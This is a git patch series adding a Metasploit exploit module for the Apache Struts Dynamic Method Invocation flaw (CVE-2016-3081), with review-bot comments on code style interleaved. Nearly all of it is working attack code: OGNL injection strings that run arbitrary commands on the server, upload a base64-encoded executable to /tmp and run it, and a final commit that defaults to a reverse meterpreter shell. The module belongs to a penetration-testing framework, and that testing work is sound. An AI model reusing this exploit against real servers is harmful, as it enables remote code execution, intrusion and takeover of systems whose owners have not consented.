From 643591546e9a7b86c23bb02dc2a1dc4ec503772e Mon Sep 17 00:00:00 2001 From: join-us Date: Fri, 29 Apr 2016 10:49:56 +0800 Subject: [PATCH 1/9] struts s2_032 rce - linux_stager --- ...uts_code_exec_dynamic_method_invocation.rb | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb new file mode 100644 index 0000000000..03074139ed --- /dev/null +++ b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb 
@@ -0,0 +1,183 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache Struts + version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code + Execution can be performed via method: prefix when Dynamic Method Invocation + is enabled. + }, + 'Author' => [ 'Nixawk' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-3081' ], + [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ] + ], + 'Platform' => %w{ linux }, + 'Privileged' => true, + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DisclosureDate' => 'Apr 27 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), + OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. 
Ensure there is a trailing slash!', nil]) + ], self.class) + end + + def send_http_request(payload) + uri = normalize_uri(datastore['TARGETURI']) + send_request_cgi( + 'uri' => uri + payload, + 'version' => '1.1', + 'method' => 'GET') + end + + def parameterize(params) # params is a hash + URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&')) + end + + def generate_rce_payload(code, params_hash) + payload = "?method:" + payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") + payload << "," + payload << Rex::Text.uri_encode(code) + payload << "," + payload << Rex::Text.uri_encode("1?#xx:#request.toString") + payload << "&" + payload << parameterize(params_hash) + payload + end + + def temp_path + return nil unless datastore['TMP_PATH'] + unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') + fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') + end + datastore['TMP_PATH'] + end + + def upload_file(filename, content) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + var_c = rand_text_alpha_lower(4) + var_d = rand_text_alpha_lower(4) + + code = "##{var_a}=new sun.misc.BASE64Decoder()," + code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0])))," + code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0]))," + code << "##{var_b}.close()" + + params_hash = { var_c => filename, var_d => content } + payload = generate_rce_payload(code, params_hash) + + send_http_request(payload) + end + + def execute_command(cmd) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + var_c = rand_text_alpha_lower(4) + var_d = rand_text_alpha_lower(4) + var_e = rand_text_alpha_lower(4) + var_f = rand_text_alpha_lower(4) + + code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream()," + code << "##{var_b}=new 
java.io.InputStreamReader(##{var_a})," + code << "##{var_c}=new java.io.BufferedReader(##{var_b})," + code << "##{var_d}=new char[1024]," + code << "##{var_c}.read(##{var_d})," + + code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," + code << "##{var_e}.println(##{var_d})," + code << "##{var_e}.close()" + + cmd.tr!(' ', '+') if cmd && cmd.include?(' ') + params_hash = { var_f => cmd } + payload = generate_rce_payload(code, params_hash) + + send_http_request(payload) + end + + def linux_stager + payload_exe = rand_text_alphanumeric(4 + rand(4)) + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" + + b64_filename = Rex::Text.encode_base64(payload_exe) + b64_content = Rex::Text.encode_base64(generate_payload_exe) + + print_status("Uploading exploit to #{payload_exe}") + upload_file(b64_filename, b64_content) + + print_status("Attempting to execute the payload...") + execute_command("chmod 700 #{payload_exe}") + execute_command("/bin/sh -c #{payload_exe}") + end + + def exploit + case target['Platform'] + when 'linux' + linux_stager + when 'win' + windows_stager + when 'java' + java_stager + else + fail_with(Failure::NoTarget, 'Unsupported target platform!') + end + end + + def check + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + flag = Rex::Text.rand_text_alpha(5) + + code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," + code << "##{var_a}.print(#parameters.#{var_b}[0])," + code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two}))," + code << "##{var_a}.print(#parameters.#{var_b}[0])," + code << "##{var_a}.close()" + + params_hash = { var_b => flag } + payload = generate_rce_payload(code, params_hash) + + resp = send_http_request(payload) + + if resp && resp.code == 200 && 
resp.body.include?("#{flag}#{sum}#{flag}") + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + +end From 6f6558923b00a79e71bf12ce2053e7b7b278c774 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 10:34:48 -0500 Subject: [PATCH 2/9] Rename module as struts_dmi_exec.rb --- .../http/struts_dmi_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{multi/http/struts_code_exec_dynamic_method_invocation.rb => linux/http/struts_dmi_exec.rb} (100%) diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/linux/http/struts_dmi_exec.rb similarity index 100% rename from modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb rename to modules/exploits/linux/http/struts_dmi_exec.rb From e9535dbc5b49b947ddbb0ed809c05fbbc52e78e7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 11:03:15 -0500 Subject: [PATCH 3/9] Address all @FireFart's feedback --- .../exploits/linux/http/struts_dmi_exec.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/modules/exploits/linux/http/struts_dmi_exec.rb b/modules/exploits/linux/http/struts_dmi_exec.rb index 03074139ed..8bb0fbcd8e 100644 --- a/modules/exploits/linux/http/struts_dmi_exec.rb +++ b/modules/exploits/linux/http/struts_dmi_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code 
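Review bot: `exploit` dispatches to `windows_stager` and `java_stager`, but neither method is defined anywhere in the new file and only a Linux target is registered, so those `when` branches are dead code that would raise `NoMethodError` if ever reached; either define them or reduce the `case` to a direct `linux_stager` call. `parameterize` relies on `URI.escape`, which is obsolete (removed in Ruby 3.0); the framework's `Rex::Text.uri_encode`, already used in `generate_rce_payload`, should be applied to each key and value instead. `execute_command` mutates its argument with `cmd.tr!(' ', '+')`; the current callers pass fresh literals, but `cmd = cmd.tr(' ', '+')` avoids surprising a future caller. `check` mixes the mixin form `rand_text_alpha_lower` with the fully qualified `Rex::Text.rand_text_alpha`; pick one form for consistency.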
@@ -53,9 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote def send_http_request(payload) uri = normalize_uri(datastore['TARGETURI']) send_request_cgi( - 'uri' => uri + payload, - 'version' => '1.1', - 'method' => 'GET') + 'uri' => "#{uri}#{payload}", + 'method' => 'POST') end def parameterize(params) # params is a hash @@ -75,11 +74,14 @@ class MetasploitModule < Msf::Exploit::Remote end def temp_path - return nil unless datastore['TMP_PATH'] - unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') - fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') - end - datastore['TMP_PATH'] + @tmp_path ||= lambda { + path = datastore['TMP_PATH'] + return nil unless path + unless path.end_with?('/') + path << '/' + end + return path + }.call end def upload_file(filename, content) From 9e56bb8358b325e85d931e9a65fa668c8e64ae6c Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:08:00 +0800 Subject: [PATCH 4/9] send http request (get -> post) --- ...uts_code_exec_dynamic_method_invocation.rb | 36 ++++++++++--------- 1 file changed, 19 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb index 03074139ed..f483268b4c 100644 --- a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb +++ b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb 
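Review bot: The rewritten `temp_path` appends the slash with `path << '/'`, which mutates the string held in `datastore['TMP_PATH']` in place instead of returning a normalised copy, and the `lambda { ... }.call` wrapper is heavier than the logic needs (note also that `||=` will not memoize a `nil` result, so the lambda runs again on every call when the option is unset). A plain body does the same without the side effect: `path = datastore['TMP_PATH']` / `return nil unless path` / `path.end_with?('/') ? path : "#{path}/"`. The same in-place `<<` pattern is carried forward unchanged into the later `TMPPATH` rename in this series, so the fix applies there too.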
@@ -50,27 +50,23 @@ class MetasploitModule < Msf::Exploit::Remote ], self.class) end - def send_http_request(payload) + def send_http_request(payload, params) uri = normalize_uri(datastore['TARGETURI']) send_request_cgi( - 'uri' => uri + payload, - 'version' => '1.1', - 'method' => 'GET') + 'uri' => uri + payload, + 'version' => '1.1', + 'method' => 'POST', + 'vars_post' => params + ) end - def parameterize(params) # params is a hash - URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&')) - end - - def generate_rce_payload(code, params_hash) + def generate_rce_payload(code) payload = "?method:" payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") payload << "," payload << Rex::Text.uri_encode(code) payload << "," payload << Rex::Text.uri_encode("1?#xx:#request.toString") - payload << "&" - payload << parameterize(params_hash) payload end @@ -94,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote code << "##{var_b}.close()" params_hash = { var_c => filename, var_d => content } - payload = generate_rce_payload(code, params_hash) + payload = generate_rce_payload(code) - send_http_request(payload) + send_http_request(payload, params_hash) end def execute_command(cmd) @@ -119,9 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote cmd.tr!(' ', '+') if cmd && cmd.include?(' ') params_hash = { var_f => cmd } - payload = generate_rce_payload(code, params_hash) + payload = generate_rce_payload(code) - send_http_request(payload) + send_http_request(payload, params_hash) end def linux_stager @@ -140,6 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote execute_command("/bin/sh -c #{payload_exe}") end + def windows_stager + end + + def java_stager + end + def exploit case target['Platform'] when 'linux' 
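Review bot: The new `windows_stager` and `java_stager` are empty, so selecting a 'win' or 'java' target in `exploit` would return silently with nothing done instead of failing; until they are implemented each should `fail_with(Failure::NoTarget, 'This target platform is not implemented yet')`, or the `case` should be reduced to the Linux path that actually exists. In the first hunk, `send_http_request(payload, params)` makes `params` mandatory, so any remaining one-argument caller would raise `ArgumentError`; all four callers in this patch are updated, but a default of `params = {}` would keep the helper tolerant. `exploit`'s body continues outside the hunk.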
@@ -169,9 +171,9 @@ class MetasploitModule < Msf::Exploit::Remote code << "##{var_a}.close()" params_hash = { var_b => flag } - payload = generate_rce_payload(code, params_hash) + payload = generate_rce_payload(code) - resp = send_http_request(payload) + resp = send_http_request(payload, params_hash) if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") Exploit::CheckCode::Appears From 97061c1b90fe013c415b433793bd55d8a41bce5f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 11:13:25 -0500 Subject: [PATCH 5/9] Update struts_dmi_exec.rb --- .../exploits/linux/http/struts_dmi_exec.rb | 36 ++++++++++--------- 1 file changed, 19 insertions(+), 17 deletions(-) diff --git a/modules/exploits/linux/http/struts_dmi_exec.rb b/modules/exploits/linux/http/struts_dmi_exec.rb index 8bb0fbcd8e..c5b07e3721 100644 --- a/modules/exploits/linux/http/struts_dmi_exec.rb +++ b/modules/exploits/linux/http/struts_dmi_exec.rb @@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE - include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 
@@ -46,15 +45,23 @@ class MetasploitModule < Msf::Exploit::Remote [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), - OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil]) + OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil]) ], self.class) end + def print_status(msg='') + super("#{peer} - #{msg}") + end + def send_http_request(payload) uri = normalize_uri(datastore['TARGETURI']) - send_request_cgi( + res = send_request_cgi( 'uri' => "#{uri}#{payload}", 'method' => 'POST') + if res && res.code == 404 + fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') + end + res end def parameterize(params) # params is a hash @@ -74,8 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote end def temp_path - @tmp_path ||= lambda { - path = datastore['TMP_PATH'] + @TMPPATH ||= lambda { + path = datastore['TMPPATH'] return nil unless path unless path.end_with?('/') path << '/' @@ -143,16 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - case target['Platform'] - when 'linux' - linux_stager - when 'win' - windows_stager - when 'java' - java_stager - else - fail_with(Failure::NoTarget, 'Unsupported target platform!') - end + linux_stager end def check @@ -173,10 +171,14 @@ class MetasploitModule < Msf::Exploit::Remote params_hash = { var_b => flag } payload = generate_rce_payload(code, params_hash) - resp = send_http_request(payload) + begin + resp = send_http_request(payload) + rescue Msf::Exploit::Failed + return Exploit::CheckCode::Unknown + end if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") - Exploit::CheckCode::Appears + Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end 
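Review bot: `@TMPPATH ||=` in `temp_path` uses an upper-case instance variable, which reads like a constant and breaks the file's snake_case convention; renaming the option to `TMPPATH` did not require renaming the memo, and `@tmp_path` from the previous revision is the expected form. The `print_status(msg='')` override should space the default as `msg = ''` to match the surrounding definitions. The 404 guard added to `send_http_request` calls `fail_with`, which is why `check` must now rescue `Msf::Exploit::Failed`; a one-line comment such as `# a 404 means TARGETURI is wrong, not that the target is patched` beside that `rescue` would explain why the branch yields `CheckCode::Unknown` rather than `Safe`. `temp_path`'s body continues outside its hunk.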
From 1d95a8a76dc31e62dc3d8cc526747ecb3f700279 Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:13:34 +0800 Subject: [PATCH 6/9] rename struts_code_exec_dynamic_method_invocation.rb to struts_dmi_exec.rb --- ..._code_exec_dynamic_method_invocation.rb => struts_dmi_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/multi/http/{struts_code_exec_dynamic_method_invocation.rb => struts_dmi_exec.rb} (100%) diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/multi/http/struts_dmi_exec.rb similarity index 100% rename from modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb rename to modules/exploits/multi/http/struts_dmi_exec.rb From 15ffae4ae8bd1d6a8e707ddaea24629a8534ea97 Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:17:26 +0800 Subject: [PATCH 7/9] rename module name --- modules/exploits/multi/http/struts_dmi_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_dmi_exec.rb b/modules/exploits/multi/http/struts_dmi_exec.rb index f483268b4c..6421334ff3 100644 --- a/modules/exploits/multi/http/struts_dmi_exec.rb +++ b/modules/exploits/multi/http/struts_dmi_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code From 288975a9ce529e107b405e30f0f4726ae45f80be Mon Sep 17 00:00:00 2001 
From: join-us Date: Sat, 30 Apr 2016 00:44:31 +0800 Subject: [PATCH 8/9] rm modules/exploits/multi/http/struts_dmi_exec.rb --- .../exploits/multi/http/struts_dmi_exec.rb | 185 ------------------ 1 file changed, 185 deletions(-) delete mode 100644 modules/exploits/multi/http/struts_dmi_exec.rb diff --git a/modules/exploits/multi/http/struts_dmi_exec.rb b/modules/exploits/multi/http/struts_dmi_exec.rb deleted file mode 100644 index 6421334ff3..0000000000 --- a/modules/exploits/multi/http/struts_dmi_exec.rb +++ /dev/null 
@@ -1,185 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::EXE - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', - 'Description' => %q{ - This module exploits a remote command execution vulnerability in Apache Struts - version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code - Execution can be performed via method: prefix when Dynamic Method Invocation - is enabled. - }, - 'Author' => [ 'Nixawk' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-3081' ], - [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ] - ], - 'Platform' => %w{ linux }, - 'Privileged' => true, - 'Targets' => - [ - ['Linux Universal', - { - 'Arch' => ARCH_X86, - 'Platform' => 'linux' - } - ] - ], - 'DisclosureDate' => 'Apr 27 2016', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(8080), - OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), - OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. 
Ensure there is a trailing slash!', nil]) - ], self.class) - end - - def send_http_request(payload, params) - uri = normalize_uri(datastore['TARGETURI']) - send_request_cgi( - 'uri' => uri + payload, - 'version' => '1.1', - 'method' => 'POST', - 'vars_post' => params - ) - end - - def generate_rce_payload(code) - payload = "?method:" - payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") - payload << "," - payload << Rex::Text.uri_encode(code) - payload << "," - payload << Rex::Text.uri_encode("1?#xx:#request.toString") - payload - end - - def temp_path - return nil unless datastore['TMP_PATH'] - unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') - fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') - end - datastore['TMP_PATH'] - end - - def upload_file(filename, content) - var_a = rand_text_alpha_lower(4) - var_b = rand_text_alpha_lower(4) - var_c = rand_text_alpha_lower(4) - var_d = rand_text_alpha_lower(4) - - code = "##{var_a}=new sun.misc.BASE64Decoder()," - code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0])))," - code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0]))," - code << "##{var_b}.close()" - - params_hash = { var_c => filename, var_d => content } - payload = generate_rce_payload(code) - - send_http_request(payload, params_hash) - end - - def execute_command(cmd) - var_a = rand_text_alpha_lower(4) - var_b = rand_text_alpha_lower(4) - var_c = rand_text_alpha_lower(4) - var_d = rand_text_alpha_lower(4) - var_e = rand_text_alpha_lower(4) - var_f = rand_text_alpha_lower(4) - - code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream()," - code << "##{var_b}=new java.io.InputStreamReader(##{var_a})," - code << "##{var_c}=new java.io.BufferedReader(##{var_b})," - code << "##{var_d}=new char[1024]," - code << 
"##{var_c}.read(##{var_d})," - - code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," - code << "##{var_e}.println(##{var_d})," - code << "##{var_e}.close()" - - cmd.tr!(' ', '+') if cmd && cmd.include?(' ') - params_hash = { var_f => cmd } - payload = generate_rce_payload(code) - - send_http_request(payload, params_hash) - end - - def linux_stager - payload_exe = rand_text_alphanumeric(4 + rand(4)) - path = temp_path || '/tmp/' - payload_exe = "#{path}#{payload_exe}" - - b64_filename = Rex::Text.encode_base64(payload_exe) - b64_content = Rex::Text.encode_base64(generate_payload_exe) - - print_status("Uploading exploit to #{payload_exe}") - upload_file(b64_filename, b64_content) - - print_status("Attempting to execute the payload...") - execute_command("chmod 700 #{payload_exe}") - execute_command("/bin/sh -c #{payload_exe}") - end - - def windows_stager - end - - def java_stager - end - - def exploit - case target['Platform'] - when 'linux' - linux_stager - when 'win' - windows_stager - when 'java' - java_stager - else - fail_with(Failure::NoTarget, 'Unsupported target platform!') - end - end - - def check - var_a = rand_text_alpha_lower(4) - var_b = rand_text_alpha_lower(4) - - addend_one = rand_text_numeric(rand(3) + 1).to_i - addend_two = rand_text_numeric(rand(3) + 1).to_i - sum = addend_one + addend_two - flag = Rex::Text.rand_text_alpha(5) - - code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," - code << "##{var_a}.print(#parameters.#{var_b}[0])," - code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two}))," - code << "##{var_a}.print(#parameters.#{var_b}[0])," - code << "##{var_a}.close()" - - params_hash = { var_b => flag } - payload = generate_rce_payload(code) - - resp = send_http_request(payload, params_hash) - - if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") - Exploit::CheckCode::Appears - else - Exploit::CheckCode::Safe - end - end - 
-end From d6a6577c5cd0646aac35895e8f8acf9004148c27 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 11:52:50 -0500 Subject: [PATCH 9/9] Default payload to linux/x86/meterpreter/reverse_tcp_uuid Default to linux/x86/meterpreter/reverse_tcp_uuid for now because of issue #6833 --- modules/exploits/linux/http/struts_dmi_exec.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/linux/http/struts_dmi_exec.rb b/modules/exploits/linux/http/struts_dmi_exec.rb index c5b07e3721..8c38fff8ef 100644 --- a/modules/exploits/linux/http/struts_dmi_exec.rb +++ b/modules/exploits/linux/http/struts_dmi_exec.rb @@ -29,6 +29,9 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Platform' => %w{ linux }, 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid' + }, 'Targets' => [ ['Linux Universal',